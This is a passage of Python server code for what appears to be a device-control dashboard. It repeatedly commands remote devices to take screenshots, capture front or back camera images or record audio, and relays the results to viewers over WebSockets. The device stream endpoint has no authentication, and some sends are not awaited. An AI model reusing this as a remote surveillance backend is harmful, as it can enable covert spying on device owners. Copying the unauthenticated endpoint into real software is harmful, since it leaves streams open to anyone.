  1048вҶ’  1048вҶ’    
  1049вҶ’  1049вҶ’    if device_id in store.jpeg_stream_info:
  1050вҶ’  1050вҶ’        store.jpeg_stream_info[device_id]['active'] = False
  1051вҶ’  1051вҶ’    
  1052вҶ’  1052вҶ’    return json_response({"ok": True})
  1053вҶ’  1053вҶ’
  1054вҶ’  1054вҶ’
  1055вҶ’  1055вҶ’async def api_jpeg_stream_start(request: web.Request) -> web.Response:
  1056вҶ’  1056вҶ’    """Start JPEG screenshot-based streaming (web/admin)."""
  1057вҶ’  1057вҶ’    session = get_auth_session(request)
  1058вҶ’  1058вҶ’    if not session:
  1059вҶ’  1059вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
  1060вҶ’  1060вҶ’    
  1061вҶ’  1061вҶ’    try:
  1062вҶ’  1062вҶ’        body = await request.json()
  1063вҶ’  1063вҶ’    except:
  1064вҶ’  1064вҶ’        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
  1065вҶ’  1065вҶ’    
  1066вҶ’  1066вҶ’    device_id = body.get('device_id', '')
  1067вҶ’  1067вҶ’    stream_type = body.get('type', 'screen')
  1068вҶ’  1068вҶ’    interval = body.get('interval', JPEG_STREAM_INTERVAL)
  1069вҶ’  1069вҶ’    
  1070вҶ’  1070вҶ’    if not device_id:
  1071вҶ’  1071вҶ’        return json_response({"ok": False, "message": "Missing device_id"}, 400)
  1072вҶ’  1072вҶ’    
  1073вҶ’  1073вҶ’    # Check if already streaming
  1074вҶ’  1074вҶ’    if device_id in store.jpeg_stream_tasks and not store.jpeg_stream_tasks[device_id].done():
  1075вҶ’  1075вҶ’        return json_response({"ok": False, "message": "Stream already active"}, 400)
  1076вҶ’  1076вҶ’    
  1077вҶ’  1077вҶ’    # Start JPEG stream loop
  1078вҶ’  1078вҶ’    async def jpeg_loop():
  1079вҶ’  1079вҶ’        cmd = "screenshot" if stream_type == "screen" else "front_camera"
  1080вҶ’  1080вҶ’        if stream_type == "back_camera":
  1081вҶ’  1081вҶ’            cmd = "back_camera"
  1082вҶ’  1082вҶ’        elif stream_type == "audio":
  1083вҶ’  1083вҶ’            cmd = "record_audio"
  1084вҶ’  1084вҶ’        
  1085вҶ’  1085вҶ’        store.jpeg_stream_info[device_id] = {
  1086вҶ’  1086вҶ’            "active": True,
  1087вҶ’  1087вҶ’            "type": stream_type,
  1088вҶ’  1088вҶ’            "interval": interval,
  1089вҶ’  1089вҶ’            "started_at": datetime.utcnow().isoformat(),
  1090вҶ’  1090вҶ’            "frame_count": 0,
  1091вҶ’  1091вҶ’        }
  1092вҶ’  1092вҶ’        
  1093вҶ’  1093вҶ’        while store.jpeg_stream_info.get(device_id, {}).get('active', False):
  1094вҶ’  1094вҶ’            try:
  1095вҶ’  1095вҶ’                queued = await store.queue_command(
  1096вҶ’  1096вҶ’                    device_id=device_id,
  1097вҶ’  1097вҶ’                    command=cmd,
  1098вҶ’  1098вҶ’                    params={},
  1099вҶ’  1099вҶ’                    requested_by=session['user_id'],
  1100вҶ’  1100вҶ’                    source="jpeg_stream"
  1101вҶ’  1101вҶ’                )
  1102вҶ’  1102вҶ’                
  1103вҶ’  1103вҶ’                if _fb.firebase_connected:
  1104вҶ’  1104вҶ’                    await push_command(device_id, {
  1105вҶ’  1105вҶ’                        "id": queued['id'],
  1106вҶ’  1106вҶ’                        "command": cmd,
  1107вҶ’  1107вҶ’                        "params": {},
  1108вҶ’  1108вҶ’                        "created_at": queued['created_at'],
  1109вҶ’  1109вҶ’                    })
  1110вҶ’  1110вҶ’                
  1111вҶ’  1111вҶ’                store.jpeg_stream_info[device_id]['frame_count'] = \
  1112вҶ’  1112вҶ’                    store.jpeg_stream_info[device_id].get('frame_count', 0) + 1
  1113вҶ’  1113вҶ’                
  1114вҶ’  1114вҶ’                await asyncio.sleep(interval)
  1115вҶ’  1115вҶ’            except asyncio.CancelledError:
  1116вҶ’  1116вҶ’                break
  1117вҶ’  1117вҶ’            except Exception as e:
  1118вҶ’  1118вҶ’                logger.error(f"JPEG stream error: {e}")
  1119вҶ’  1119вҶ’                await asyncio.sleep(5)
  1120вҶ’  1120вҶ’    
  1121вҶ’  1121вҶ’    store.jpeg_stream_tasks[device_id] = asyncio.create_task(jpeg_loop())
  1122вҶ’  1122вҶ’    return json_response({"ok": True, "message": "Stream started"})
  1123вҶ’  1123вҶ’
  1124вҶ’  1124вҶ’
  1125вҶ’  1125вҶ’async def api_jpeg_stream_stop(request: web.Request) -> web.Response:
  1126вҶ’  1126вҶ’    """Stop JPEG streaming."""
  1127вҶ’  1127вҶ’    session = get_auth_session(request)
  1128вҶ’  1128вҶ’    if not session:
  1129вҶ’  1129вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
  1130вҶ’  1130вҶ’    
  1131вҶ’  1131вҶ’    try:
  1132вҶ’  1132вҶ’        body = await request.json()
  1133вҶ’  1133вҶ’    except:
  1134вҶ’  1134вҶ’        body = {}
  1135вҶ’  1135вҶ’    
  1136вҶ’  1136вҶ’    device_id = body.get('device_id', '')
  1137вҶ’  1137вҶ’    
  1138вҶ’  1138вҶ’    if device_id in store.jpeg_stream_info:
  1139вҶ’  1139вҶ’        store.jpeg_stream_info[device_id]['active'] = False
  1140вҶ’  1140вҶ’    
  1141вҶ’  1141вҶ’    # Send stop command
  1142вҶ’  1142вҶ’    if device_id in store.jpeg_stream_tasks and not store.jpeg_stream_tasks[device_id].done():
  1143вҶ’  1143вҶ’        store.jpeg_stream_tasks[device_id].cancel()
  1144вҶ’  1144вҶ’    
  1145вҶ’  1145вҶ’    return json_response({"ok": True, "message": "Stream stopped"})
  1146вҶ’  1146вҶ’
  1147вҶ’  1147вҶ’
  1148вҶ’  1148вҶ’# в”Җв”Җв”Җ WebSocket Handlers в”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җ
  1149вҶ’  1149вҶ’
  1150вҶ’  1150вҶ’async def ws_dashboard(request: web.Request) -> web.Response:
  1151вҶ’  1151вҶ’    """Dashboard real-time updates WebSocket."""
  1152вҶ’  1152вҶ’    token = request.query.get('token', '')
  1153вҶ’  1153вҶ’    session = store.validate_session(token)
  1154вҶ’  1154вҶ’    if not session:
  1155вҶ’  1155вҶ’        return web.Response(status=401, text="Unauthorized")
  1156вҶ’  1156вҶ’    
  1157вҶ’  1157вҶ’    ws = web.WebSocketResponse(heartbeat=30)
  1158вҶ’  1158вҶ’    await ws.prepare(request)
  1159вҶ’  1159вҶ’    store.dashboard_ws_clients.add(ws)
  1160вҶ’  1160вҶ’    
  1161вҶ’  1161вҶ’    try:
  1162вҶ’  1162вҶ’        # Send initial data
  1163вҶ’  1163вҶ’        stats = store.get_stats()
  1164вҶ’  1164вҶ’        devices = await store.get_user_devices(session['user_id'])
  1165вҶ’  1165вҶ’        await ws.send_json({
  1166вҶ’  1166вҶ’            "type": "init",
  1167вҶ’  1167вҶ’            "devices": devices,
  1168вҶ’  1168вҶ’            "stats": stats,
  1169вҶ’  1169вҶ’            "commands": COMMAND_REGISTRY,
  1170вҶ’  1170вҶ’            "categories": CMD_CATEGORIES,
  1171вҶ’  1171вҶ’        })
  1172вҶ’  1172вҶ’        
  1173вҶ’  1173вҶ’        async for msg in ws:
  1174вҶ’  1174вҶ’            if msg.type == WSMsgType.TEXT:
  1175вҶ’  1175вҶ’                if msg.data == "ping":
  1176вҶ’  1176вҶ’                    await ws.send_json({"type": "pong"})
  1177вҶ’  1177вҶ’                elif msg.data == "get_stats":
  1178вҶ’  1178вҶ’                    await ws.send_json({"type": "stats_update", "stats": store.get_stats()})
  1179вҶ’  1179вҶ’            elif msg.type in (WSMsgType.ERROR, WSMsgType.CLOSE):
  1180вҶ’  1180вҶ’                break
  1181вҶ’  1181вҶ’    except Exception:
  1182вҶ’  1182вҶ’        pass
  1183вҶ’  1183вҶ’    finally:
  1184вҶ’  1184вҶ’        store.dashboard_ws_clients.discard(ws)
  1185вҶ’  1185вҶ’    
  1186вҶ’  1186вҶ’    return ws
  1187вҶ’  1187вҶ’
  1188вҶ’  1188вҶ’
  1189вҶ’  1189вҶ’async def ws_stream(request: web.Request) -> web.Response:
  1190вҶ’  1190вҶ’    """Device streaming WebSocket."""
  1191вҶ’  1191вҶ’    device_id = request.query.get('device_id', '')
  1192вҶ’  1192вҶ’    stream_id = request.query.get('stream_id', '')
  1193вҶ’  1193вҶ’    
  1194вҶ’  1194вҶ’    ws = web.WebSocketResponse(heartbeat=10)
  1195вҶ’  1195вҶ’    await ws.prepare(request)
  1196вҶ’  1196вҶ’    
  1197вҶ’  1197вҶ’    key = f"{device_id}:{stream_id}"
  1198вҶ’  1198вҶ’    store.stream_connections[key] = {"ws": ws, "type": "device", "last_activity": time.time()}
  1199вҶ’  1199вҶ’    
  1200вҶ’  1200вҶ’    try:
  1201вҶ’  1201вҶ’        async for msg in ws:
  1202вҶ’  1202вҶ’            if msg.type == WSMsgType.BINARY:
  1203вҶ’  1203вҶ’                # Video/audio frame from device
  1204вҶ’  1204вҶ’                store.latest_frames[f"{device_id}:video"] = {
  1205вҶ’  1205вҶ’                    "data": msg.data if isinstance(msg.data, str) else "",
  1206вҶ’  1206вҶ’                    "timestamp": time.time(),
  1207вҶ’  1207вҶ’                    "source": "stream",
  1208вҶ’  1208вҶ’                }
  1209вҶ’  1209вҶ’                
  1210вҶ’  1210вҶ’                # Forward to any viewer
  1211вҶ’  1211вҶ’                for conn_key, conn in list(store.stream_connections.items()):
  1212вҶ’  1212вҶ’                    if conn.get('type') == 'viewer' and conn.get('target_stream') == stream_id:
  1213вҶ’  1213вҶ’                        try:
  1214вҶ’  1214вҶ’                            if conn.get('ws') and not conn['ws'].closed:
  1215вҶ’  1215вҶ’                                conn['ws'].send_bytes(msg.data)
  1216вҶ’  1216вҶ’                        except Exception:
  1217вҶ’  1217вҶ’                            pass
  1218вҶ’  1218вҶ’                
  1219вҶ’  1219вҶ’                store.stream_connections[key]['last_activity'] = time.time()
  1220вҶ’  1220вҶ’            
  1221вҶ’  1221вҶ’            elif msg.type == WSMsgType.TEXT:
  1222вҶ’  1222вҶ’                try:
  1223вҶ’  1223вҶ’                    data = json.loads(msg.data)
  1224вҶ’  1224вҶ’                    msg_type = data.get('type', '')
  1225вҶ’  1225вҶ’                    
  1226вҶ’  1226вҶ’                    if msg_type == 'config':
  1227вҶ’  1227вҶ’                        store.jpeg_stream_info[device_id] = data
  1228вҶ’  1228вҶ’                    
  1229вҶ’  1229вҶ’                    elif msg_type == 'frame':
  1230вҶ’  1230вҶ’                        # Base64 frame
  1231вҶ’  1231вҶ’                        frame_data = data.get('data', '')
  1232вҶ’  1232вҶ’                        if frame_data:
  1233вҶ’  1233вҶ’                            store.latest_frames[f"{device_id}:video"] = {
  1234вҶ’  1234вҶ’                                "data": frame_data,
  1235вҶ’  1235вҶ’                                "timestamp": time.time(),
  1236вҶ’  1236вҶ’                                "source": data.get('source', 'stream'),
  1237вҶ’  1237вҶ’                                "is_keyframe": data.get('is_keyframe', False),
  1238вҶ’  1238вҶ’                            }
  1239вҶ’  1239вҶ’                            # Forward to viewers
  1240вҶ’  1240вҶ’                            for conn_key, conn in list(store.stream_connections.items()):
  1241вҶ’  1241вҶ’                                if conn.get('type') == 'viewer' and conn.get('target_stream') == stream_id:
  1242вҶ’  1242вҶ’                                    try:
  1243вҶ’  1243вҶ’                                        if conn.get('ws') and not conn['ws'].closed:
  1244вҶ’  1244вҶ’                                            conn['ws'].send_json(data)
  1245вҶ’  1245вҶ’                                    except Exception:
  1246вҶ’  1246вҶ’                                        pass
  1247вҶ’  1247вҶ’                except json.JSONDecodeError:
  1248вҶ’  1248вҶ’                    pass
  1249вҶ’  1249вҶ’            
  1250вҶ’  1250вҶ’            elif msg.type in (WSMsgType.ERROR, WSMsgType.CLOSE):
  1251вҶ’  1251вҶ’                break
  1252вҶ’  1252вҶ’    except Exception:
  1253вҶ’  1253вҶ’        pass
  1254вҶ’  1254вҶ’    finally:
  1255вҶ’  1255вҶ’        store.stream_connections.pop(key, None)
  1256вҶ’  1256вҶ’        if device_id in store.jpeg_stream_info:
  1257вҶ’  1257вҶ’            store.jpeg_stream_info[device_id]['active'] = False
  1258вҶ’  1258вҶ’    
  1259вҶ’  1259вҶ’    return ws
  1260вҶ’  1260вҶ’
  1261вҶ’  1261вҶ’
  1262вҶ’  1262вҶ’async def ws_stream_viewer(request: web.Request) -> web.Response:
  1263вҶ’  1263вҶ’    """Viewer WebSocket for watching streams."""
  1264вҶ’  1264вҶ’    stream_id = request.query.get('stream_id', '')
  1265вҶ’  1265вҶ’    token = request.query.get('token', '')
  1266вҶ’  1266вҶ’    session = store.validate_session(token)
  1267вҶ’  1267вҶ’    if not session:
  1268вҶ’  1268вҶ’        return web.Response(status=401, text="Unauthorized")
  1269вҶ’  1269вҶ’    
  1270вҶ’  1270вҶ’    ws = web.WebSocketResponse(heartbeat=10)
  1271вҶ’  1271вҶ’    await ws.prepare(request)
  1272вҶ’  1272вҶ’    
  1273вҶ’  1273вҶ’    key = f"viewer_{stream_id}_{id(ws)}"
  1274вҶ’  1274вҶ’    store.stream_connections[key] = {
  1275вҶ’  1275вҶ’        "ws": ws,
  1276вҶ’  1276вҶ’        "type": "viewer",
  1277вҶ’  1277вҶ’        "target_stream": stream_id,
  1278вҶ’  1278вҶ’        "last_activity": time.time(),
  1279вҶ’  1279вҶ’    }
  1280вҶ’  1280вҶ’    
  1281вҶ’  1281вҶ’    try:
  1282вҶ’  1282вҶ’        async for msg in ws:
  1283вҶ’  1283вҶ’            if msg.type == WSMsgType.TEXT:
  1284вҶ’  1284вҶ’                try:
  1285вҶ’  1285вҶ’                    data = json.loads(msg.data)
  1286вҶ’  1286вҶ’                    # Forward control commands to device stream
  1287вҶ’  1287вҶ’                    for conn_key, conn in list(store.stream_connections.items()):
  1288вҶ’  1288вҶ’                        if conn.get('type') == 'device' and stream_id in conn_key:
  1289вҶ’  1289вҶ’                            try:
  1290вҶ’  1290вҶ’                                if conn.get('ws') and not conn['ws'].closed:
  1291вҶ’  1291вҶ’                                    conn['ws'].send_json(data)
  1292вҶ’  1292вҶ’                            except Exception:
  1293вҶ’  1293вҶ’                                pass
  1294вҶ’  1294вҶ’                except json.JSONDecodeError:
  1295вҶ’  1295вҶ’                    pass
  1296вҶ’  1296вҶ’            elif msg.type in (WSMsgType.ERROR, WSMsgType.CLOSE):
  1297вҶ’  1297вҶ’                break
  1298вҶ’  1298вҶ’    except Exception:
  1299вҶ’  1299вҶ’        pass
  1300вҶ’  1300вҶ’    finally:
  1301вҶ’  1301вҶ’        store.stream_connections.pop(key, None)
  1302вҶ’  1302вҶ’    
  1303вҶ’  1303вҶ’    return ws
  1304вҶ’  1304вҶ’
  1305вҶ’  1305вҶ’
  1306вҶ’  1306вҶ’# в”Җв”Җв”Җ Dashboard Push Loop в”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җ
  1307вҶ’  1307вҶ’
  1308вҶ’  1308вҶ’async def dashboard_push_loop():
  1309вҶ’  1309вҶ’    """Push stats updates to connected dashboard WebSockets."""
  1310вҶ’  1310вҶ’    while True:
  1311вҶ’  1311вҶ’        try:
  1312вҶ’  1312вҶ’            await asyncio.sleep(4)
  1313вҶ’  1313вҶ’            if not store.dashboard_ws_clients:
  1314вҶ’  1314вҶ’                continue
  1315вҶ’  1315вҶ’            
  1316вҶ’  1316вҶ’            stats = store.get_stats()
  1317вҶ’  1317вҶ’            dead = set()
  1318вҶ’  1318вҶ’            
  1319вҶ’  1319вҶ’            for ws in store.dashboard_ws_clients:
  1320вҶ’  1320вҶ’                try:
  1321вҶ’  1321вҶ’                    if ws.closed:
  1322вҶ’  1322вҶ’                        dead.add(ws)
  1323вҶ’  1323вҶ’                        continue
  1324вҶ’  1324вҶ’                    await ws.send_json({"type": "stats_update", "stats": stats})
  1325вҶ’  1325вҶ’                except Exception:
  1326вҶ’  1326вҶ’                    dead.add(ws)
  1327вҶ’  1327вҶ’            
  1328вҶ’  1328вҶ’            store.dashboard_ws_clients -= dead
  1329вҶ’  1329вҶ’        except asyncio.CancelledError:
  1330вҶ’  1330вҶ’            break
  1331вҶ’  1331вҶ’        except Exception:
  1332вҶ’  1332вҶ’            await asyncio.sleep(5)